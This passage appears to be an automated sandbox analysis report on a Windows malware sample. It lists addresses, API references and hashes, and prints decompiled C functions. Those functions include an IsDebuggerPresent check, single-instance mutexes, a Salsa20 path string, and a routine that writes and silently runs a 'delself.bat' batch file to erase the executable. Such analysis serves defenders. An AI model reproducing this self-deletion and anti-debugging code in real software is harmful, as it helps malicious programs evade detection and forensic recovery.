                                                                                                    0x0040c13c
                                                                                                    0x0040c13f
                                                                                                    0x0040c142
                                                                                                    0x0040c147
                                                                                                    0x0040c14a
                                                                                                    0x0040c153
                                                                                                    0x0040c156
                                                                                                    0x0040c15f
                                                                                                    0x0040c162
                                                                                                    0x0040c169
                                                                                                    0x0040c16c
                                                                                                    0x0040c16f
                                                                                                    0x0040c178
                                                                                                    0x0040c17b
                                                                                                    0x0040c184
                                                                                                    0x0040c187
                                                                                                    0x0040c189
                                                                                                    0x0040c191
                                                                                                    0x0040c194
                                                                                                    0x0040c19c
                                                                                                    0x0040c19f
                                                                                                    0x0040c1a7
                                                                                                    0x0040c1aa
                                                                                                    0x0040c1b1
                                                                                                    0x0040c1b4
                                                                                                    0x0040c1bc
                                                                                                    0x0040c1bf
                                                                                                    0x0040c1c6
                                                                                                    0x0040c1cc
                                                                                                    0x0040c1cf
                                                                                                    0x0040c1d5
                                                                                                    0x0040c1d8
                                                                                                    0x0040c1da
                                                                                                    0x0040c1e3
                                                                                                    0x0040c1e6
                                                                                                    0x0040c1ed
                                                                                                    0x0040c1f0
                                                                                                    0x0040c1f3
                                                                                                    0x0040c1f8
                                                                                                    0x0040c1fb
                                                                                                    0x0040c203
                                                                                                    0x0040c206
                                                                                                    0x0040c209
                                                                                                    0x0040c20c
                                                                                                    0x0040c212
                                                                                                    0x0040c215
                                                                                                    0x0040c218
                                                                                                    0x0040c21b
                                                                                                    0x0040c221
                                                                                                    0x0040c227
                                                                                                    0x0040c22e
                                                                                                    0x0040c231
                                                                                                    0x0040c234
                                                                                                    0x0040c23a
                                                                                                    0x0040c242
                                                                                                    0x0040c245
                                                                                                    0x0040c248
                                                                                                    0x0040c24b
                                                                                                    0x0040c251
                                                                                                    0x0040c254
                                                                                                    0x0040c257
                                                                                                    0x0040c25d
                                                                                                    0x0040c264
                                                                                                    0x0040c267
                                                                                                    0x0040c26a
                                                                                                    0x0040c26d
                                                                                                    0x0040c270
                                                                                                    0x0040c275
                                                                                                    0x0040c278
                                                                                                    0x0040c27e
                                                                                                    0x0040c283
                                                                                                    0x0040c286
                                                                                                    0x0040c289
                                                                                                    0x0040c28e
                                                                                                    0x0040c291
                                                                                                    0x0040c298
                                                                                                    0x0040c29b
                                                                                                    0x0040c29e
                                                                                                    0x0040c2a1
                                                                                                    0x0040c2a6
                                                                                                    0x0040c2a9
                                                                                                    0x0040c2ab
                                                                                                    0x0040c2ad
                                                                                                    0x0040c2b3
                                                                                                    0x0040c2b9
                                                                                                    0x0040c2bc
                                                                                                    0x0040c2c2
                                                                                                    0x0040c2c8
                                                                                                    0x0040c2cb
                                                                                                    0x0040c2cd
                                                                                                    0x0040c2d0
                                                                                                    0x0040c2d6
                                                                                                    0x0040c2d9
                                                                                                    0x0040c2de
                                                                                                    0x0040c2e1
                                                                                                    0x0040c2e6
                                                                                                    0x0040c2e9
                                                                                                    0x0040c2eb
                                                                                                    0x0040c2eb
                                                                                                    0x0040c2ee
                                                                                                    0x0040c2ee
                                                                                                    0x0040c2f7
                                                                                                    0x0040c2fa
                                                                                                    0x0040c2fc
                                                                                                    0x0040c2ff
                                                                                                    0x0040c302
                                                                                                    0x0040c305
                                                                                                    0x0040c308
                                                                                                    0x0040c310
                                                                                                    0x0040c319
                                                                                                    0x0040c31e
                                                                                                    0x0040c322
                                                                                                    0x0040c32b
                                                                                                    0x0040c330
                                                                                                    0x0040c337
                                                                                                    0x0040c340
                                                                                                    0x0040c342
                                                                                                    0x0040c345
                                                                                                    0x0040c345
                                                                                                    0x0040c34a
                                                                                                    0x0040c352
                                                                                                    0x0040c357
                                                                                                    0x0040c35d
                                                                                                    0x0040c368
                                                                                                    0x0040c36b
                                                                                                    0x0040c36f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c371
                                                                                                    0x0040c371
                                                                                                    0x0040c378
                                                                                                    0x0040c379
                                                                                                    0x0040c37b
                                                                                                    0x0040c37c
                                                                                                    0x0040c37e
                                                                                                    0x0040c37f
                                                                                                    0x0040c380
                                                                                                    0x0040c384
                                                                                                    0x0040c387
                                                                                                    0x0040c38a
                                                                                                    0x0040c38d
                                                                                                    0x0040c38d
                                                                                                    0x0040c390
                                                                                                    0x00000000
                                                                                                    0x0040c398
                                                                                                    0x0040c39e

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                    • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __wassert
                                                                                                    • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                    • API String ID: 3993402318-1975116136
                                                                                                    • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                    • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                    • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                    • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 74%
                                                                                                    			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                    				char _v0;
                                                                                                    				signed int _v8;
                                                                                                    				intOrPtr _v524;
                                                                                                    				intOrPtr _v528;
                                                                                                    				void* _v532;
                                                                                                    				intOrPtr _v536;
                                                                                                    				char _v540;
                                                                                                    				intOrPtr _v544;
                                                                                                    				intOrPtr _v548;
                                                                                                    				intOrPtr _v552;
                                                                                                    				intOrPtr _v556;
                                                                                                    				intOrPtr _v560;
                                                                                                    				intOrPtr _v564;
                                                                                                    				intOrPtr _v568;
                                                                                                    				intOrPtr _v572;
                                                                                                    				intOrPtr _v576;
                                                                                                    				intOrPtr _v580;
                                                                                                    				intOrPtr _v584;
                                                                                                    				char _v724;
                                                                                                    				intOrPtr _v792;
                                                                                                    				char _v800;
                                                                                                    				signed int _v804;
                                                                                                    				intOrPtr _v808;
                                                                                                    				char _v812;
                                                                                                    				void* __edi;
                                                                                                    				signed int _t41;
                                                                                                    				char* _t46;
                                                                                                    				char* _t48;
                                                                                                    				intOrPtr _t59;
                                                                                                    				intOrPtr _t60;
                                                                                                    				intOrPtr _t65;
                                                                                                    				intOrPtr _t66;
                                                                                                    				int _t67;
                                                                                                    				intOrPtr _t68;
                                                                                                    				signed int _t69;
                                                                                                    
                                                                                                    				_t68 = __esi;
                                                                                                    				_t65 = __edx;
                                                                                                    				_t59 = __ebx;
                                                                                                    				_t41 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_t42 = _t41 ^ _t69;
                                                                                                    				_v8 = _t41 ^ _t69;
                                                                                                    				if(_a4 != 0xffffffff) {
                                                                                                    					_push(_a4);
                                                                                                    					E00432A69(_t42);
                                                                                                    					_pop(_t60);
                                                                                                    				}
                                                                                                    				_v804 = _v804 & 0x00000000;
                                                                                                    				E0042B420( &_v800, 0, 0x4c);
                                                                                                    				_v812 =  &_v804;
                                                                                                    				_t46 =  &_v724;
                                                                                                    				_v808 = _t46;
                                                                                                    				_v548 = _t46;
                                                                                                    				_v552 = _t60;
                                                                                                    				_v556 = _t65;
                                                                                                    				_v560 = _t59;
                                                                                                    				_v564 = _t68;
                                                                                                    				_v568 = _t66;
                                                                                                    				_v524 = ss;
                                                                                                    				_v536 = cs;
                                                                                                    				_v572 = ds;
                                                                                                    				_v576 = es;
                                                                                                    				_v580 = fs;
                                                                                                    				_v584 = gs;
                                                                                                    				asm("pushfd");
                                                                                                    				_pop( *_t23);
                                                                                                    				_v540 = _v0;
                                                                                                    				_t48 =  &_v0;
                                                                                                    				_v528 = _t48;
                                                                                                    				_v724 = 0x10001;
                                                                                                    				_v544 =  *((intOrPtr*)(_t48 - 4));
                                                                                                    				_v804 = _a8;
                                                                                                    				_v800 = _a12;
                                                                                                    				_v792 = _v0;
                                                                                                    				_t67 = IsDebuggerPresent();
                                                                                                    				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                                                                    					_push(_a4);
                                                                                                    					E00432A69(_t55);
                                                                                                    				}
                                                                                                    				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
                                                                                                    			}






































                                                                                                    0x00424168
                                                                                                    0x00424168
                                                                                                    0x00424168
                                                                                                    0x00424171
                                                                                                    0x00424176
                                                                                                    0x00424178
                                                                                                    0x00424180
                                                                                                    0x00424182
                                                                                                    0x00424185
                                                                                                    0x0042418a
                                                                                                    0x0042418a
                                                                                                    0x0042418b
                                                                                                    0x0042419d
                                                                                                    0x004241ab
                                                                                                    0x004241b1
                                                                                                    0x004241b7
                                                                                                    0x004241bd
                                                                                                    0x004241c3
                                                                                                    0x004241c9
                                                                                                    0x004241cf
                                                                                                    0x004241d5
                                                                                                    0x004241db
                                                                                                    0x004241e1
                                                                                                    0x004241e8
                                                                                                    0x004241ef
                                                                                                    0x004241f6
                                                                                                    0x004241fd
                                                                                                    0x00424204
                                                                                                    0x0042420b
                                                                                                    0x0042420c
                                                                                                    0x00424215
                                                                                                    0x0042421b
                                                                                                    0x0042421e
                                                                                                    0x00424224
                                                                                                    0x00424231
                                                                                                    0x0042423a
                                                                                                    0x00424243
                                                                                                    0x0042424c
                                                                                                    0x00424258
                                                                                                    0x00424269
                                                                                                    0x00424275
                                                                                                    0x00424278
                                                                                                    0x0042427d
                                                                                                    0x0042428c

                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 0042419D
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DebuggerPresent_memset
                                                                                                    • String ID: i;B
                                                                                                    • API String ID: 2328436684-472376889
                                                                                                    • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                    • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                    • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                    • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004329EC(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                    
                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                    				return UnhandledExceptionFilter(_a4);
                                                                                                    			}



                                                                                                    0x004329f1
                                                                                                    0x00432a01

                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                                    • Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
                                                                                                    • Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                                    • Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 37%
                                                                                                    			E004387C8(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                    				signed int _t5;
                                                                                                    				signed int _t6;
                                                                                                    				int _t8;
                                                                                                    
                                                                                                    				_t5 =  *0x5292d8; // 0x58c4f29c
                                                                                                    				_t6 = _t5 ^  *0x50ad20;
                                                                                                    				if(_t6 == 0) {
                                                                                                    					 *0x511344 = _a4;
                                                                                                    					_t8 = EnumSystemLocalesW(E004387B4, 1);
                                                                                                    					 *0x511344 =  *0x511344 & 0x00000000;
                                                                                                    					return _t8;
                                                                                                    				} else {
                                                                                                    					return  *_t6(_a4, _a8, _a12, 0);
                                                                                                    				}
                                                                                                    			}






                                                                                                    0x004387cb
                                                                                                    0x004387d0
                                                                                                    0x004387d6
                                                                                                    0x004387f1
                                                                                                    0x004387f6
                                                                                                    0x004387fc
                                                                                                    0x00438804
                                                                                                    0x004387d8
                                                                                                    0x004387e6
                                                                                                    0x004387e6

                                                                                                    APIs
                                                                                                    • EnumSystemLocalesW.KERNEL32(004387B4,00000001,?,004376BC,0043775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004387F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
                                                                                                    • Instruction ID: e2c19f37e5f1fa56fd16d2c75426893bf8b780345540c0397aa12dc95392e8cd
                                                                                                    • Opcode Fuzzy Hash: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
                                                                                                    • Instruction Fuzzy Hash: 4DE08C32150308FBCF21CFA0EC41FD83BA6BB58710F104419F61C4AA60CB71A964EB48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,?,0042580F,?,0042580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00438875
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
                                                                                                    • Instruction ID: 4201596fe771204303fc80694ffa3c51b65a798dd9aa63856d52ff29377aa1ed
                                                                                                    • Opcode Fuzzy Hash: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
                                                                                                    • Instruction Fuzzy Hash: 7ED0173200020CFF8F01AFE1EC45C6A7B69FF0C314B180409FA1C45120DA36A820EB25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004329BB(_Unknown_base(*)()* _a4) {
                                                                                                    
                                                                                                    				return SetUnhandledExceptionFilter(_a4);
                                                                                                    			}



                                                                                                    0x004329c8

                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                                    • Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
                                                                                                    • Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                                    • Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 87%
                                                                                                    			E004124E0() {
                                                                                                    				long _v8;
                                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                                    				struct _STARTUPINFOA _v100;
                                                                                                    				char _v364;
                                                                                                    				char _v628;
                                                                                                    				void _v1668;
                                                                                                    				char _v1932;
                                                                                                    				char _v2956;
                                                                                                    				long _t40;
                                                                                                    				signed int _t48;
                                                                                                    				void* _t78;
                                                                                                    				intOrPtr _t79;
                                                                                                    				int _t104;
                                                                                                    				long _t106;
                                                                                                    				int _t108;
                                                                                                    				void* _t110;
                                                                                                    				intOrPtr* _t113;
                                                                                                    				void* _t115;
                                                                                                    
                                                                                                    				if( *0x513234 == 0) {
                                                                                                    					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
                                                                                                    					_t40 = GetLastError();
                                                                                                    					_push( *0x513230);
                                                                                                    					if(_t40 != 0xb7) {
                                                                                                    						CloseHandle();
                                                                                                    						 *0x513230 = 0;
                                                                                                    						goto L7;
                                                                                                    					} else {
                                                                                                    						_t104 = CloseHandle();
                                                                                                    						 *0x513230 = 0;
                                                                                                    						return _t104;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
                                                                                                    					_t106 = GetLastError();
                                                                                                    					_push( *0x513238);
                                                                                                    					if(_t106 != 0xb7) {
                                                                                                    						CloseHandle();
                                                                                                    						 *0x513238 = 0;
                                                                                                    						L7:
                                                                                                    						if(E00412360() == 0) {
                                                                                                    							GetModuleFileNameA(0,  &_v628, 0x104);
                                                                                                    							GetShortPathNameA( &_v628,  &_v628, 0x104);
                                                                                                    							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
                                                                                                    							asm("sbb eax, eax");
                                                                                                    							lstrcpyA( &_v364, _t48 &  &_v1932);
                                                                                                    							lstrcatA( &_v364, "\\");
                                                                                                    							lstrcatA( &_v364, "delself.bat");
                                                                                                    							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
                                                                                                    							lstrcatA( &_v1668,  &_v628);
                                                                                                    							lstrcatA( &_v1668, "\"\r\nif exist \"");
                                                                                                    							lstrcatA( &_v1668,  &_v628);
                                                                                                    							lstrcatA( &_v1668, "\" goto try\r\n");
                                                                                                    							lstrcatA( &_v1668, "del \"");
                                                                                                    							lstrcatA( &_v1668,  &_v364);
                                                                                                    							lstrcatA( &_v1668, "\"");
                                                                                                    							if(PathFileExistsA( &_v364) != 0) {
                                                                                                    								DeleteFileA( &_v364);
                                                                                                    							}
                                                                                                    							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
                                                                                                    							_t113 =  &_v1668;
                                                                                                    							_t110 = _t78;
                                                                                                    							_t115 = _t113 + 1;
                                                                                                    							do {
                                                                                                    								_t79 =  *_t113;
                                                                                                    								_t113 = _t113 + 1;
                                                                                                    							} while (_t79 != 0);
                                                                                                    							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
                                                                                                    							FlushFileBuffers(_t110);
                                                                                                    							CloseHandle(_t110);
                                                                                                    							E0042B420( &_v100, 0, 0x44);
                                                                                                    							_v100.cb = 0x44;
                                                                                                    							_v100.dwFlags = 1;
                                                                                                    							_v100.wShowWindow = 0;
                                                                                                    							SetLastError(0);
                                                                                                    							lstrcpyA( &_v2956, "\"");
                                                                                                    							lstrcatA( &_v2956,  &_v364);
                                                                                                    							lstrcatA( &_v2956, "\"");
                                                                                                    							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
                                                                                                    							CloseHandle(_v24.hThread);
                                                                                                    							return CloseHandle(_v24);
                                                                                                    						} else {
                                                                                                    							return E00412440();
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						_t108 = CloseHandle();
                                                                                                    						 *0x513238 = 0;
                                                                                                    						return _t108;
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}





















                                                                                                    0x004124f3
                                                                                                    0x00412556
                                                                                                    0x0041255b
                                                                                                    0x00412561
                                                                                                    0x0041256c
                                                                                                    0x0041258b
                                                                                                    0x0041258d
                                                                                                    0x00000000
                                                                                                    0x0041256e
                                                                                                    0x0041256e
                                                                                                    0x00412574
                                                                                                    0x00412584
                                                                                                    0x00412584
                                                                                                    0x004124f5
                                                                                                    0x00412504
                                                                                                    0x00412509
                                                                                                    0x0041250f
                                                                                                    0x0041251a
                                                                                                    0x00412539
                                                                                                    0x0041253b
                                                                                                    0x00412597
                                                                                                    0x0041259e
                                                                                                    0x004125ba
                                                                                                    0x004125cd
                                                                                                    0x004125e4
                                                                                                    0x004125fa
                                                                                                    0x00412606
                                                                                                    0x0041261a
                                                                                                    0x00412628
                                                                                                    0x00412636
                                                                                                    0x00412646
                                                                                                    0x00412654
                                                                                                    0x00412664
                                                                                                    0x00412672
                                                                                                    0x00412680
                                                                                                    0x00412690
                                                                                                    0x0041269e
                                                                                                    0x004126af
                                                                                                    0x004126b8
                                                                                                    0x004126b8
                                                                                                    0x004126d7
                                                                                                    0x004126dd
                                                                                                    0x004126e3
                                                                                                    0x004126e5
                                                                                                    0x004126e8
                                                                                                    0x004126e8
                                                                                                    0x004126ea
                                                                                                    0x004126eb
                                                                                                    0x00412700
                                                                                                    0x00412707
                                                                                                    0x0041270e
                                                                                                    0x00412718
                                                                                                    0x00412720
                                                                                                    0x00412729
                                                                                                    0x00412730
                                                                                                    0x00412735
                                                                                                    0x00412747
                                                                                                    0x0041275b
                                                                                                    0x00412769
                                                                                                    0x00412788
                                                                                                    0x00412791
                                                                                                    0x0041279e
                                                                                                    0x004125a0
                                                                                                    0x004125ab
                                                                                                    0x004125ab
                                                                                                    0x0041251c
                                                                                                    0x0041251c
                                                                                                    0x00412522
                                                                                                    0x00412532
                                                                                                    0x00412532
                                                                                                    0x0041251a

                                                                                                    APIs
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                    • GetLastError.KERNEL32 ref: 00412509
                                                                                                    • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                    • CloseHandle.KERNEL32 ref: 00412539
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                    • GetLastError.KERNEL32 ref: 0041255B
                                                                                                    • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                    • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                    • API String ID: 2372642624-488272950
                                                                                                    • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                    • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                    • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                    • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 56%
                                                                                                    			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
                                                                                                    				intOrPtr _v0;
                                                                                                    				intOrPtr _v4;
                                                                                                    				intOrPtr _v8;
                                                                                                    				intOrPtr _v12;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				signed int _t125;
                                                                                                    				void* _t141;
                                                                                                    				void* _t146;
                                                                                                    				void* _t151;
                                                                                                    				void* _t157;
                                                                                                    				intOrPtr _t159;
                                                                                                    				void* _t162;
                                                                                                    				intOrPtr _t164;
                                                                                                    				intOrPtr _t168;
                                                                                                    				intOrPtr _t169;
                                                                                                    				intOrPtr _t173;
                                                                                                    				intOrPtr _t176;
                                                                                                    				intOrPtr _t178;
                                                                                                    				intOrPtr _t180;
                                                                                                    				intOrPtr _t183;
                                                                                                    				char _t186;
                                                                                                    				intOrPtr _t188;
                                                                                                    				intOrPtr _t193;
                                                                                                    				intOrPtr _t206;
                                                                                                    				intOrPtr _t210;
                                                                                                    				intOrPtr _t218;
                                                                                                    				void* _t219;
                                                                                                    				intOrPtr _t222;
                                                                                                    				intOrPtr _t224;
                                                                                                    				char _t236;
                                                                                                    				void* _t237;
                                                                                                    				void* _t240;
                                                                                                    				void* _t241;
                                                                                                    				intOrPtr _t244;
                                                                                                    				intOrPtr _t251;
                                                                                                    				void* _t252;
                                                                                                    				intOrPtr _t253;
                                                                                                    				intOrPtr _t257;
                                                                                                    				void* _t258;
                                                                                                    				intOrPtr* _t261;
                                                                                                    				intOrPtr _t262;
                                                                                                    				intOrPtr _t263;
                                                                                                    				intOrPtr _t264;
                                                                                                    				intOrPtr* _t265;
                                                                                                    				void* _t266;
                                                                                                    				intOrPtr _t267;
                                                                                                    				intOrPtr _t269;
                                                                                                    				signed int _t271;
                                                                                                    				signed int _t272;
                                                                                                    				void* _t274;
                                                                                                    				void* _t275;
                                                                                                    				void* _t279;
                                                                                                    				void* _t280;
                                                                                                    				void* _t284;
                                                                                                    
                                                                                                    				_t247 = __edx;
                                                                                                    				E0042F7C0(0x188);
                                                                                                    				_t125 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_a388 = _t125 ^ _t271;
                                                                                                    				_push(__ebx);
                                                                                                    				_a16 = _a400;
                                                                                                    				_push(__ebp);
                                                                                                    				_a28 = _a404;
